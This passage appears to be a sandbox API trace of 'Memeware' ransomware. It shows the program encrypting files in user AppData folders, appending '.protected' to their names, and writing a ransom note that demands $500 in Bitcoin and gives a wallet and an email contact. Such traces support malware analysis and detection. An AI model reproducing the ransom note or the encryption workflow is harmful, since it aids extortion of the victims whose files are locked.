(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.407] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.407] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.407] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0090.407] CloseHandle (hObject=0xd8) returned 1 [0090.407] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.407] lstrcmpiW (lpString1="UProof", lpString2="Windows") returned -1 [0090.407] lstrcmpiW (lpString1="UProof", lpString2="Program Files") returned 1 [0090.407] lstrcmpiW (lpString1="UProof", lpString2="Program Files (x86)") returned 1 [0090.407] lstrcmpiW (lpString1="UProof", lpString2="$Recycle.bin") returned 1 [0090.407] lstrcmpiW (lpString1="UProof", lpString2="System Volume Information") returned 1 [0090.407] 
wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof") returned 66 [0090.407] lstrcmpW (lpString1="UProof", lpString2=".") returned 1 [0090.407] lstrcmpW (lpString1="UProof", lpString2="..") returned 1 [0090.407] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\*") returned 68 [0090.407] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.408] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.408] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.408] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.408] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.408] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.408] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\.") returned 68 [0090.408] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.408] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.408] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.408] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.408] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.408] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.408] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.408] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\..") returned 69 [0090.408] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.408] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.408] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.408] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="Windows") returned -1 [0090.408] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="Program Files") returned -1 [0090.408] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="Program Files (x86)") returned -1 [0090.408] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="$Recycle.bin") returned 1 [0090.408] lstrcmpiW (lpString1="CUSTOM.DIC", lpString2="System Volume Information") returned -1 [0090.408] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC") returned 77 [0090.408] StrStrIW (lpFirst="CUSTOM.DIC", lpSrch=".protected") returned 0x0 [0090.408] lstrcmpW (lpString1="CUSTOM.DIC", lpString2="RESTORE_FILES.txt") returned -1 [0090.408] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0090.409] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0090.409] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\custom.dic"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.409] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC") returned 77 [0090.409] StrStrW (lpFirst="CUSTOM.DIC", lpSrch=".txt") 
returned 0x0 [0090.409] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC") returned 77 [0090.409] StrStrW (lpFirst="CUSTOM.DIC", lpSrch=".rar") returned 0x0 [0090.410] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC") returned 77 [0090.410] StrStrW (lpFirst="CUSTOM.DIC", lpSrch=".zip") returned 0x0 [0090.410] ReadFile (in: hFile=0x14c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ea24*=0x2, lpOverlapped=0x0) returned 1 [0090.410] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffffffe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.410] WriteFile (in: hFile=0x14c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ea24*=0x2, lpOverlapped=0x0) returned 1 [0090.410] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.410] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0090.411] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0090.411] CloseHandle (hObject=0x14c) returned 1 [0090.411] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC.protected") returned 87 [0090.411] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\custom.dic"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\custom.dic.protected")) returned 1 [0090.411] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.411] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.411] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\RESTORE_FILES.txt") returned 84 [0090.411] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.412] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.412] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.412] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.412] WriteFile (in: hFile=0xd8, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.413] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.413] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0090.413] CloseHandle (hObject=0xd8) returned 1 [0090.413] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.413] lstrcmpiW (lpString1="Windows", lpString2="Windows") returned 0 [0090.413] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.413] lstrcmpiW (lpString1="Word", lpString2="Windows") returned 1 [0090.413] lstrcmpiW (lpString1="Word", lpString2="Program Files") returned 1 [0090.413] lstrcmpiW (lpString1="Word", lpString2="Program Files (x86)") returned 1 [0090.413] lstrcmpiW (lpString1="Word", lpString2="$Recycle.bin") returned 1 [0090.413] lstrcmpiW (lpString1="Word", lpString2="System Volume Information") returned 1 [0090.413] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word") returned 64 [0090.413] lstrcmpW (lpString1="Word", lpString2=".") returned 1 [0090.413] lstrcmpW (lpString1="Word", lpString2="..") returned 1 [0090.413] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\*") returned 66 [0090.413] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.416] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.416] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.416] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.416] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.416] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.416] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\.") returned 66 [0090.416] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.416] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.416] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.416] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.416] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.416] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.416] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.416] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\..") returned 67 [0090.416] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.416] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.416] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.416] lstrcmpiW (lpString1="STARTUP", lpString2="Windows") returned -1 [0090.417] lstrcmpiW (lpString1="STARTUP", lpString2="Program Files") returned 1 [0090.417] lstrcmpiW (lpString1="STARTUP", lpString2="Program Files (x86)") returned 1 [0090.417] lstrcmpiW (lpString1="STARTUP", 
lpString2="$Recycle.bin") returned 1 [0090.417] lstrcmpiW (lpString1="STARTUP", lpString2="System Volume Information") returned -1 [0090.417] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP") returned 72 [0090.417] lstrcmpW (lpString1="STARTUP", lpString2=".") returned 1 [0090.417] lstrcmpW (lpString1="STARTUP", lpString2="..") returned 1 [0090.417] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*") returned 74 [0090.417] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0090.417] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.417] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.417] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.417] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.417] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.417] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\.") returned 74 [0090.417] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.417] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.417] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.417] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.417] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.417] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.417] lstrcmpiW (lpString1="..", lpString2="System Volume 
Information") returned -1 [0090.417] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\..") returned 75 [0090.417] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.417] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.417] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0090.417] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0090.417] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\RESTORE_FILES.txt") returned 90 [0090.417] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\word\\startup\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.418] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.418] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0090.419] lstrlenA (lpString="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") returned 684 [0090.419] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.419] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.419] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, 
lpOverlapped=0x0) returned 1 [0090.419] CloseHandle (hObject=0x14c) returned 1 [0090.419] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.419] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.419] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\RESTORE_FILES.txt") returned 82 [0090.419] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\word\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.420] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.420] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.420] lstrlenA (lpString="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") returned 684 [0090.420] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.420] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.420] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0090.420] CloseHandle (hObject=0xd8) returned 1 [0090.420] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0090.420] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0090.421] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\RESTORE_FILES.txt") returned 77 [0090.421] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0090.421] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
